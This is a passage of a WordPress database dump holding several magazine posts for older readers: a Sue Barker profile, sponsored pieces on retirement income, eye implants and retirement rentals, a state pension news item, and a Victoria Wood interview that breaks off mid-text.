and','publish','open','open','','how-i-see-it-monica-porter','','','2018-04-02 20:03:44','2018-04-02 20:03:44','',0,'http://westonspirit.org.uk/how-i-see-it-monica-porter.asp',0,'post','',0),(273,1,'2015-10-02 08:18:13','2015-10-02 08:18:13','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">20 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"How the Paignton Peach became the        face of Wimbledon\" st_url=\"http://westonspirit.org.uk/2013/05/how-the-paignton-peach-became-the-face-of-wimbledon/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"How the Paignton Peach became the        face of Wimbledon\" st_url=\"http://westonspirit.org.uk/2013/05/how-the-paignton-peach-became-the-face-of-wimbledon/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"How the Paignton Peach became the        face of Wimbledon\" st_url=\"http://westonspirit.org.uk/2013/05/how-the-paignton-peach-became-the-face-of-wimbledon/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"How the Paignton Peach became the        face of Wimbledon\" st_url=\"http://westonspirit.org.uk/2013/05/how-the-paignton-peach-became-the-face-of-wimbledon/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"How the Paignton Peach became the        face of Wimbledon\" st_url=\"http://westonspirit.org.uk/2013/05/how-the-paignton-peach-became-the-face-of-wimbledon/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>Kate Battersby says it is about time Sue Barker is given the credit she deserves<span id=\"more-3302\"></span></h3>&#13;\n<p><a href=\"/\" rel=\"attachment wp-att-3306\"><img class=\"aligncenter size-full wp-image-3306\" title=\"Sue Barker\" src=\"/wp-content/uploads/2013/05/Sue-Barker.jpg\" alt=\"\" width=\"596\" height=\"566\" /></a></p>&#13;\n<p>It is an oddity of Sue Barker’s serial careers in tennis and television that she is frequently discussed in terms of who or what she is not. </p>&#13;\n<p>Hence she did not win Wimbledon, or “even” reach the widely forecast all-British final against ultimate champion Virginia Wade in 1977; she never went higher than the world number three ranking she reached at the age of 21; as a presenter, she is not lauded in the same breath as, say, national treasure Clare Balding. </p>&#13;\n<p>Time to redress the balance.</p>&#13;\n<p>Would that a British woman now were “merely” the world number three. Laura Robson and Heather Watson are rightly applauded for their mutual presence in the top 50, but neither is in imminent danger of repeating Barker’s Grand Slam semi-finals in Australia and at Wimbledon, and certainly not her Grand Slam win at the French Open in 1976 – a prize which, typically, did not even place her in the top three in the BBC’s Sports Personality of the Year.</p>&#13;\n<p>But perhaps least celebrated is her tenure in front of the BBC cameras at Wimbledon. She was first part of the Corporation’s presenting team there 20 years ago, assuming the chief presenter’s mantle from broadcasting titan Des Lynam in 1997. </p>&#13;\n<p>She won the Royal Television Society’s best sports presenter award – the proverbial “Oscar” – in 2001, and has anchored the Grand National, world athletics, winter and summer Olympics, and Sports Personality of the Year, not to mention 16 years of <br /><em>A Question Of Sport</em>. She is quite clearly one of the BBC’s top three sports presenters.</p>&#13;\n<p><strong>Imminent retirement </strong></p>&#13;\n<p>Next month she will once again steer the nation through Wimbledon, yet for at least eight years observers have been forecasting her imminent “retirement”. </p>&#13;\n<p>It is said that Generation Murray does not relate to her – although surely that says more about them than Barker. For it is possibly among her most significant achievements that she is that rarest sight on British television – a woman presenter of comparative age. </p>&#13;\n<p>Her current mark of 57 is hardly geriatric, besides which she looks great. But as early as 49 her age was publicly remarked upon as being extraordinary for a presenter – by which, of course, what was meant is extraordinary for a woman presenter.</p>&#13;\n<p>No doubt this is all in the nature of television; the response of us, the viewers, is not always what the programme-makers would hope it to be, that our focus is not always quite on the big stories they wish to convey, but the irrelevant details we perceive. Does it matter? If it does, Barker has never gone on public record to complain about her lot.</p>&#13;\n<p>Having started on the small screen on Australia’s Channel 7 in 1985 and journeyed via (what was then) British Sky Broadcasting to arrive at the nation’s premier broadcaster, she appears to be among those television professionals who is simply grateful for all that life has brought her. </p>&#13;\n<p>Even her domestic life has long been the stuff of contented tranquillity; after early romantic skirmishes with Australian tennis player Syd Ball, golfer Greg Norman and even Cliff Richard, she celebrates her silver wedding anniversary this summer to ex-policeman Lance Tankard. Their home in 26 prime Surrey acres is the stuff of a Hollywood location scout’s dream</p>&#13;\n<p><strong>A key face </strong></p>&#13;\n<p>Meanwhile, the “Paignton Peach”, as she was named in her playing days, remains one of the key faces of the BBC; her signature good cheer forever in evidence, apparently unperturbed by the latest<em> rumour-du-jour</em>. </p>&#13;\n<p>Ironically, it is said her television career led to the only occasion she has picked up the Venus Rosewater Dish, when the Wimbledon women’s singles trophy was in the BBC studio with her. A photograph of her brandishing the salver in an off-air moment hangs on a wall at home. It takes a certain contentment and peace of mind to do that.</p>&#13;\n<p>As we watch her this summer, two decades after she first joined the BBC Wimbledon team, we might do well to remember that you simply don’t get to front 20 years of prime-time television by accident. It only happens when the presenter in question is outstandingly good. Sue Barker is that presenter. And she isn’t done yet.</p>&#13;\n									</div>','How the Paignton Peach became the        face of Wimbledon','Kate Battersby says it is about time Sue Barker is given the credit she deserves It is an oddity of Sue Barker’s serial careers in tennis and television','publish','open','open','','how-the-paignton-peach-became-the-face-of-wimbledon','','','2018-04-02 20:03:42','2018-04-02 20:03:42','',0,'http://westonspirit.org.uk/how-the-paignton-peach-became-the-face-of-wimbledon.asp',0,'post','',0),(274,1,'2016-03-12 16:25:06','2016-03-12 16:25:06','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Majority of us not prepared for unexpected retirement\" st_url=\"http://westonspirit.org.uk/2013/05/majority-of-us-not-prepared-for-unexpected-retirement/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Majority of us not prepared for unexpected retirement\" st_url=\"http://westonspirit.org.uk/2013/05/majority-of-us-not-prepared-for-unexpected-retirement/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Majority of us not prepared for unexpected retirement\" st_url=\"http://westonspirit.org.uk/2013/05/majority-of-us-not-prepared-for-unexpected-retirement/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Majority of us not prepared for unexpected retirement\" st_url=\"http://westonspirit.org.uk/2013/05/majority-of-us-not-prepared-for-unexpected-retirement/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Majority of us not prepared for unexpected retirement\" st_url=\"http://westonspirit.org.uk/2013/05/majority-of-us-not-prepared-for-unexpected-retirement/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h3>Two thirds retire earlier than planned, mostly due to ill health and job loss, survey finds</h3>&#13;\n<p><a href=\"/\" rel=\"attachment wp-att-3264\"><img class=\"size-medium wp-image-3264 alignleft\" title=\"Aegon\" src=\"/wp-content/uploads/2013/05/Aegon-300x216.jpg\" alt=\"\" width=\"300\" height=\"216\" /></a></p>&#13;\n<p>While many dream of retiring early, for most of us it’s simply not a viable option. However, results from the recent Aegon Retirement Readiness survey show that 60 per cent of respondents had to leave work sooner than planned, mostly due to ill health or job loss.</p>&#13;\n<p>Commenting on the survey results, Aegon’s chief executive Simon Skinner said: “A surprisingly high number had to retire earlier than they expected to due to ill health or unemployment. Unfortunately, many of these individuals couldn’t rely on the government pension as they hadn’t reached the state pension age.”</p>&#13;\n<p>Early retirement, when unplanned, often means people are left without a stable income for a period of time. Despite this risk, more than three quarters of respondents (77 per cent) have no backup plan if they can’t work until their planned retirement date.</p>&#13;\n<p>“The survey results show us that those who are forced to retire earlier than they want to face some real challenges. Perhaps the biggest challenge is the income gap between early retirement and receiving their pension,” adds Skinner.</p>&#13;\n<p>If you do use your savings to fill this gap, you’ll have less to support you and your family later on in your retirement. </p>&#13;\n<p>“Traditionally, many people relied on deposit interest to supplement their retirement income. Nowadays, with such low interest rates, not everyone will get the income they want from interest earned on their savings, so people need to think differently about how they fund their retirement income,” says Skinner.</p>&#13;\n<p>It’s also important to remember that retirement income should last for your lifetime, which can be a lot longer than you might imagine. Worryingly, the perception of retirement and life expectancy is skewed, with the survey showing most Britons plan to retire at 65 for an expected period of 18 years. However, on average, half of 60-year-olds today can expect to live until they are 90.</p>&#13;\n<p>All of these factors mean more and more people are looking for alternative retirement income solutions. To meet this growing need, Aegon offers a guaranteed minimum income through its Aegon Secure Lifetime Income solution. Customers get a guaranteed level of income for the rest of their lives alongside the opportunity to benefit from any growth in their underlying investments. Their income can grow but will never fall. Customers can also choose to delay taking income and, for each year they do this, Aegon will increase their income by 3.25 per cent of the original investment. </p>&#13;\n<p>“This gives customers certainty over their minimum returns if they decide not to take income right away, and assures them of a lifetime income,” says Skinner. “So, if you’re one of the 60 per cent who have had to retire early, you can have security at whatever point you need.”</p>&#13;\n<p>Death benefit options are also given, so any money remaining will be left to your loved ones, which Skinner feels is of significant value as many alternative long-term income guarantees do not allow you to pass on anything when you die.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<h5>For more information, please contact a financial adviser or visit <br /><a href=\"http://www.unbiased.co.uk/\" target=\"_blank\">www.unbiased.co.uk</a></h5>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Majority of us not prepared for unexpected retirement','Two thirds retire earlier than planned, mostly due to ill health and job loss, survey finds While many dream of retiring early, for most of us it’s simply','publish','open','open','','majority-of-us-not-prepared-for-unexpected-retirement','','','2018-04-02 20:03:41','2018-04-02 20:03:41','',0,'http://westonspirit.org.uk/majority-of-us-not-prepared-for-unexpected-retirement.asp',0,'post','',0),(275,1,'2016-01-24 14:11:34','2016-01-24 14:11:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"‘Now I have eyesight like everyone else’\" st_url=\"http://westonspirit.org.uk/2013/05/now-i-have-eyesight-like-everyone-else/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"‘Now I have eyesight like everyone else’\" st_url=\"http://westonspirit.org.uk/2013/05/now-i-have-eyesight-like-everyone-else/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"‘Now I have eyesight like everyone else’\" st_url=\"http://westonspirit.org.uk/2013/05/now-i-have-eyesight-like-everyone-else/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"‘Now I have eyesight like everyone else’\" st_url=\"http://westonspirit.org.uk/2013/05/now-i-have-eyesight-like-everyone-else/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"‘Now I have eyesight like everyone else’\" st_url=\"http://westonspirit.org.uk/2013/05/now-i-have-eyesight-like-everyone-else/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h3>Overcome shortsightedness through a revolutionary implant</h3>&#13;\n<div id=\"attachment_3270\" class=\"wp-caption aligncenter\" style=\"width: 606px\"><a href=\"/\" rel=\"attachment wp-att-3270\"><img class=\"size-full wp-image-3270 \" title=\"London_Eye_Hospital_Wimpole_Hospital\" src=\"http://westonspirit.org.uk/wp-content/uploads/2013/05/London_Eye_Hospital_Wimpole_Hospital.jpg\" alt=\"\" width=\"596\" height=\"398\" /></a><p class=\"wp-caption-text\">The London Eye Hospital</p></div>&#13;\n<p>Michael Woodhouse, 56, has been shortsighted for most of his life but, thanks to a new eye implant, he’s now enjoying life without contact lenses. He has recently been fitted with the new LEH Trifocal Lens, at The London Eye Hospital on Harley Street. </p>&#13;\n<p>This new lens is a major step forward for multifocal lenses, which have been in use in their current form for more than a decade. Previous lenses have had to find a compromise between poor intermediate vision and glare or halos often experienced at night, especially when driving. The new lenses give crystal clear near, middle and far vision – and virtually no glare or halos, making them the most effective and pleasant option for patients. </p>&#13;\n<p><strong>Be proactive </strong></p>&#13;\n<p>Woodhouse, who is managing director of a sustainable energy company, says he had been aware of his sight getting worse and wanted to do something about it.</p>&#13;\n<p>“I’ve been shortsighted for a long time. I’ve been wearing contact lenses since I was 19 and was starting to have to wear glasses over the top of my contacts for driving, as well as having some problems with reading. My eyes were getting very dry and my contacts were getting uncomfortable, especially if I was out cycling,” he says.</p>&#13;\n<p>“I was determined to do something about it and booked a consultation with Mr Qureshi at the London Eye Hospital. He recommended having the Femtosecond laser treatment and Trifocal lenses fitted. I researched it all online and, just as he’d said, it appeared to be more accurate and carry less risk than other available treatments. </p>&#13;\n<p>“I had the first eye treated four weeks ago and the second eye done a fortnight ago. It was pretty much painless and day-by-day my sight has got better. Very quickly after the surgery they were able to tell me that I had almost 20:20 vision. </p>&#13;\n<p>“I had contact lenses for so long so it’s nice to no longer need them. I’m finally without the shortsightedness I’ve been living with for years and years and have eyesight like everyone else. I’ve certainly got no regrets about having it done.”</p>&#13;\n<p>The LEH Trifocal lens is suitable for anyone in their late 30s, or older, who has long or short sight, even if they have an astigmatism. The lens is also suitable for anyone with cataracts, so millions of people who currently wear glasses or contact lenses could benefit.</p>&#13;\n<p><strong>Lenses change lives </strong></p>&#13;\n<p>Consultant ophthalmic surgeon and medical director of the London Eye Hospital, Mr Bobby Qureshi, says the new LEH Trifocal lenses are easily fitted and will change lives: “Using our Femtosecond cataract laser, the operation is performed in a matter of minutes; 30 seconds of laser and three minutes to implant the trifocal lenses, through an incision the size of a full stop – less than 1.5mm. </p>&#13;\n<p>“The results will last a lifetime, giving freedom from reading glasses and distance glasses without the glare problems associated with other implants.”</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<h5>0800 612 2021</h5>&#13;\n<h5><a href=\"http://www.londoneyehospital.com/\" target=\"_blank\">www.londoneyehospital.com</a></h5>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n									</div>','‘Now I have eyesight like everyone else’','Overcome shortsightedness through a revolutionary implant The London Eye Hospital Michael Woodhouse, 56, has been shortsighted for most of his life but,','publish','open','open','','now-i-have-eyesight-like-everyone-else','','','2018-04-02 20:03:39','2018-04-02 20:03:39','',0,'http://westonspirit.org.uk/now-i-have-eyesight-like-everyone-else.asp',0,'post','',0),(276,1,'2014-02-27 23:42:01','2014-02-27 23:42:01','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2013/05/own-your-future-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2013/05/own-your-future-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2013/05/own-your-future-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2013/05/own-your-future-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Own your future\" st_url=\"http://westonspirit.org.uk/2013/05/own-your-future-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Dreaming of the perfect retirement home but reluctant to sell your property? It’s time to wake up to the benefits of renting…?</h4>&#13;\n<p><img width=\"596\" height=\"370\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/11/Hawthorns.jpg\" style=\"float:left; margin-right:15px\" /></p>&#13;\n<p class=\"para para_consumer%3aSponsored-body_drop_cap\">Finding a practical solution that matches the quality of your retirement living dream may be easier said than done – and renting may not automatically spring to the top of your list of possible solutions.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">However, increasing numbers of UK retirees are discovering what their counterparts in America and Australia found out a few years back – that renting your retirement home offers many advantages over continued property ownership.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Even more are discovering how you can continue to benefit from both.Hawthorns Retirement has brought its highly successful American formula for retirement living to the UK at Eastbourne, Clevedon and Braintree.</p>&#13;\n<h3 class=\"para para_consumer%3aSponsored-subhead\">A flexible lifestyle</h3>&#13;\n<p class=\"para para_consumer%3aSponsored-body_no_indent\">These developments, in a nutshell, offer you continued independent living, none of the worries of home ownership and total flexibility to change your lifestyle at a month’s notice should circumstances dictate. And all this is achieved by renting your retirement home at The Hawthorns.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Your monthly rental includes all your many monthly expenses including all your meals and snacks, utility bills, housekeeping, maintenance – even a free minibus to take you to the shops and back. If you sit down and calculate what you are spending on all those items living in your own home, the rental fees appear very reasonable indeed.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">As well as the financial argument, life at The Hawthorns offers the added benefits of security, companionship and the flexibility of handing in just one month’s notice of your decision to leave.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">While many residents fund this idyllic retirement lifestyle from the proceeds of the sale of their home, many others opt to rent out their own property and fund their new-found lifestyle from the rental income, maintaining their property as part of their estate.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-subhead\">It was easy for Alan and Jean?For Alan and Jean Ward, the decision to move to The Hawthorns in Braintree was swift in the extreme. They saw an advert for the development in a paper on a Sunday morning, visited in the afternoon and signed on the dotted line the next day following a second visit.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">Their decision to rent out their existing property rather than sell it was almost as quick, as Alan explains.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“Jean has Parkinson’s, I suffer with arthritis and the thought of not having to worry about shopping, cooking and all the other home maintenance chores suddenly sounded so appealing. We loved The Hawthorns the moment we stepped inside so it was an easy as well as swift decision.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“I have to admit my initial thought was to sell our own home, a three-bedroom detached bungalow in Tiptree, but after a chat with our son we realised it made more sense to rent out our bungalow. The rental income from that subsidises our rent at The Hawthorns and enables us to enjoy not only a fabulous but an affordable lifestyle.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“Of course, it makes complete sense at the moment to rent out the bungalow. With the housing market in the doldrums, I can wait two or three years for prices to pick up and then consider selling it and getting much more capital for it – very appealing.</p>&#13;\n<p class=\"para para_consumer%3aSponsored-body\">“What’s more, we always know we still have our old home should we ever wish to return to it – which I have to say is highly unlikely, the way we feel about life here,” said Alan.</p>&#13;\n<p class=\"para para_consumer%3aconsumer_body_ind\"></p><div class=\"woo-sc-hr\"></div>&#13;\n<p>0800 077 4656</p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"><a href=\"http://www.hawthornsretirement.co.uk/\" target=\"_blank\">www.hawthornsretirement.co.uk</a></p>&#13;\n<p class=\"para para_consumer%3aSponsored-web_link\"></p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Own your future','Dreaming of the perfect retirement home but reluctant to sell your property? It’s time to wake up to the benefits of renting...? Finding a practical','publish','open','open','','own-your-future-4','','','2018-04-02 20:03:38','2018-04-02 20:03:38','',0,'http://westonspirit.org.uk/own-your-future-4.asp',0,'post','',0),(277,1,'2015-03-21 05:08:43','2015-03-21 05:08:43','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Queen delivers good news  for future of state pension\" st_url=\"http://westonspirit.org.uk/2013/05/queen-delivers-good-news-for-future-of-state-pension/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Queen delivers good news  for future of state pension\" st_url=\"http://westonspirit.org.uk/2013/05/queen-delivers-good-news-for-future-of-state-pension/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Queen delivers good news  for future of state pension\" st_url=\"http://westonspirit.org.uk/2013/05/queen-delivers-good-news-for-future-of-state-pension/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Queen delivers good news  for future of state pension\" st_url=\"http://westonspirit.org.uk/2013/05/queen-delivers-good-news-for-future-of-state-pension/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Queen delivers good news  for future of state pension\" st_url=\"http://westonspirit.org.uk/2013/05/queen-delivers-good-news-for-future-of-state-pension/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><a href=\"/\" rel=\"attachment wp-att-3310\"><img class=\"aligncenter size-full wp-image-3310\" title=\"Britain Queen\'s Speech\" src=\"/wp-content/uploads/2013/05/s465_Queen_s_Speech.jpg\" alt=\"\" width=\"596\" height=\"397\" /></a></p>&#13;\n<p>Age UK has welcomed the changes to the state pension outlined in the Queen’s Speech earlier this month. <span id=\"more-3309\"></span>The headline proposal is to introduce a flat-rate state pension of about £144 a week from April 2016. This replaces the current basic pension of £110 a week, plus various means-tested top-ups.<!--more--></p>&#13;\n<p>The Pensions Bill is designed to introduce reforms which will “make it clearer to people what they will get from the state when they retire, reduce means-testing and provide a firmer foundation for saving.” </p>&#13;\n<p>The legislation will also increase the state retirement age to 67 between 2026 and 2028, followed by future increases linked to life expectancy. </p>&#13;\n<p>Michelle Mitchell, charity director- general at Age UK, said: “The legislation announced in the Queen’s Speech has the potential to transform our crumbling and unfair social care system for current and future generations of older people, but to have any chance in succeeding we need to see the legislation twinned with a commitment in the spending review for increased spending on social care.</p>&#13;\n<p>“Good care makes good sense. If older people get good quality care at home it helps them remain independent for much longer, helps keep them out of hospital and protects families from the pressures of caring.”</p>&#13;\n<p>Pensions minister Steve Webb, the man behind the new bill, recently warned that people may need to keep working until they are 70 because of a shortage of workers. The MP said firms would need to get used to hiring older staff because, unlike overseas workers, Britain’s growing elderly population “already live here and their numbers are growing”.</p>&#13;\n<p>“This is actually enabling people to carry on and, in most cases, that is good for their wellbeing,” he said. </p>&#13;\n<p>“Over time there will be a whole set of jobs where employers need experienced older workers and a firm that doesn’t change its attitude to older workers will be left behind.”</p>&#13;\n<p>The government said Britain was running out of workers, with 13.5m vacancies predicted in the next decade but only 7m young people due to leave school and college. Ministers believe the gap can be filled by older people staying in the workplace for longer.</p>&#13;\n									</div>','Queen delivers good news  for future of state pension','Age UK has welcomed the changes to the state pension outlined in the Queen’s Speech earlier this month. The headline proposal is to introduce a flat-rate','publish','open','open','','queen-delivers-good-news-for-future-of-state-pension','','','2018-04-02 20:03:36','2018-04-02 20:03:36','',0,'http://westonspirit.org.uk/queen-delivers-good-news-for-future-of-state-pension.asp',0,'post','',0),(278,1,'2017-04-07 10:31:27','2017-04-07 10:31:27','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">19 May 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"You don’t worry about things that might have tortured you when you were younger\" st_url=\"http://westonspirit.org.uk/2013/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"You don’t worry about things that might have tortured you when you were younger\" st_url=\"http://westonspirit.org.uk/2013/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"You don’t worry about things that might have tortured you when you were younger\" st_url=\"http://westonspirit.org.uk/2013/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"You don’t worry about things that might have tortured you when you were younger\" st_url=\"http://westonspirit.org.uk/2013/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"You don’t worry about things that might have tortured you when you were younger\" st_url=\"http://westonspirit.org.uk/2013/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h3>By Jane Hooper</h3>&#13;\n<div id=\"attachment_3278\" class=\"wp-caption alignnone\" style=\"width: 606px\"><a href=\"/2013/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger/victoria-woods-nice-cup-of-tea\" rel=\"attachment wp-att-3278\"><img class=\"size-full wp-image-3278\" title=\"Victoria Wood\'s Nice Cup of Tea\" src=\"/wp-content/uploads/2013/05/Victoria1.jpg\" alt=\"\" width=\"596\" height=\"397\" /></a><p class=\"wp-caption-text\">Victoria on her travels for the BBC’s Nice Cup of Tea</p></div>&#13;\n<p>She’s glorious; a British institution. Victoria Wood is one of the most talented comedians of her generation and the woman who brought us remarkable lines like: “Beat me on the bottom with a Woman’s Weekly.” Now, today, May 19, she turns 60. It seems barely possible. Wood has such a warm and youthful persona, combining genius writing with achingly incisive observation and childish delight. How does she feel about the move into her seventh decade?</p>&#13;\n<p>“Well, it’s strange because no one thinks of themselves as being old, do they? You think of yourself as being yourself, and that’s somewhere in your 20s and 30s. The good news about it all is that the alternative to being alive at 60 isn’t great, and you do feel more confident when you’re older. Or less bothered about not being confident, in any case.</p>&#13;\n<p>“You know who you are and you know a lot of things are just not worth worrying about anymore. You kind of forget to worry about things that might have tortured you when you were younger.”</p>&#13;\n<p>Her list of writing and acting credits is an astonishing tribute to her career. There are documentaries about the obesity crisis, the remnants of the British Empire and – most recently – tea, as well as the stunning sketch show series which won her award after award and gave life to gems like <em>Acorn Antiques, </em>which developed into a stage production.</p>&#13;\n<p>When I ask which of her projects she feels most proud of, looking back, there’s a deep sigh. “I don’t do anything light-heartedly, or quickly. I’m not good at bashing things out, things take time for me. I end up working all night on things, making minute changes. What I’m saying is – it’s very hard to pick something out because they all mean a lot, they all have a lot of me in them. One thing that seems to have really appealed to people, though, is <em>Acorn Antiques</em> – that’s always had incredible feedback.”</p>&#13;\n<p>It’s no wonder – the sketch is a master-class in comedy, from the magnificent Mrs Overall, played by Julie Walters, who hovers half-in, half-out of shot, never sure when she’s supposed to come on, then rushing to answer a phone before it’s rung, or help a choking victim before she’s choked, it’s just plain funny characterisation and wonderful satire. And that’s all before the backdrops start swaying and the props fail miserably.</p>&#13;\n<p>“It’s very British humour,” she says. “We do have an odd delight in things going wrong, and a kind of fear of things that work too well, or are too perfect. We delight in nonsense and human error much more than they do in other countries. We don’t really like perfection at all.”</p>&#13;\n<p>The irony, of course, is that she created her shambolic masterpiece by orchestrating every move absolutely perfectly. </p>&#13;\n<p>Wood’s career started when she was still at university – studying drama in Birmingham. Her break came when she won the ITV talent show, <em>New Faces</em>, in 1973, when she was just 20 years old. She worked ad-hoc for a few years after that – doing stand- up comedy and revues in theatres around the country. Then, in 1987, <em>Victoria Wood As Seen On TV </em>was aired and her career sky-rocketed. The programme was a mixture of sketches and songs and starred her regular collaborators and great friends – Julie Walters and Celia Imrie. Wood won a Bafta for the programme and was announced BBC Personality of the Year for 1987.</p>&#13;\n<p>“It might have looked as if I’d suddenly made it, was an overnight sensation, but there’d been a lot of failure before the success – people never hear about that, they think people who make it to the top cruise through. It was hard work and I got a lot of things wrong, and a lot of rejections. The main thing is to keep going.”</p>&#13;\n<div id=\"attachment_3286\" class=\"wp-caption aligncenter\" style=\"width: 606px\"><a href=\"/2013/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger/victoria2\" rel=\"attachment wp-att-3286\"><img class=\"size-full wp-image-3286\" title=\"Victoria2\" src=\"/wp-content/uploads/2013/05/Victoria2.jpg\" alt=\"\" width=\"596\" height=\"410\" /></a><p class=\"wp-caption-text\">Playing her role as Berta in Acorn Antiques</p></div>&#13;\n<p><em>Margaret and Pat </em>and <em>Dinnerladies</em> took her away from the sketch show formula and showed that she was a gifted writer, able to create likeable and real characters with a stroke of her pen. So much of Wood’s comedy has its roots in the seemingly unimportant. She celebrates and delights in ordinariness. In <em>Dinnerladies</em>, the smallest, everyday issues are magnified and gently ribbed by a script which has such a light touch and is infused with such clever humour that the mundane is brought bursting into life.</p>&#13;\n<p>“People said it would be a challenge to write about dinner ladies, but to me it seemed an obvious thing to do. Everyone knows about dinner ladies – they’re everyone.”</p>&#13;\n<p>Her work has won her a vast array of awards and plaudits – writing and acting Baftas, and a CBE, but they don’t seem to interest her very much. “I’m not saying I’m not grateful, and I certainly appreciate support and positive feedback, but it’s people laughing that really moves me. </p>&#13;\n<p>“I like writing a lot more now than I used to because I’ve realised I can do it if I work at it. The fear of the blank page has gone – I know that if I work hard it’ll work.</p>&#13;\n<p>“The very frustrating thing about writing is that you write something on the page at the beginning of the day and it bears no resemblance at all to what’s in your head. </p>&#13;\n<p>Then you work at it and eventually it’s like it was in your head all along. It’s a painful process with me, but I’ve grown to like the process a lot more over time.”</p>&#13;\n<p>Wood owes her success to a great number of things – a natural warmth and likability being two of them – but there’s no doubt that hard work is high up there. “You have to work hard, there’s no way round it,” she says. “I’m not a fan of hard work any more than anyone else is, but I’ve yet to find an alternative that works.”</p>&#13;\n<p>Does she think people are born funny, or can develop their humour? “I probably think that some people are born funnier than others. I certainly think that having a funny parent helps – my father could be funny whereas mum delighted in the <br /> fact that she had no sense of humour at all. She was quite proud of the fact. My 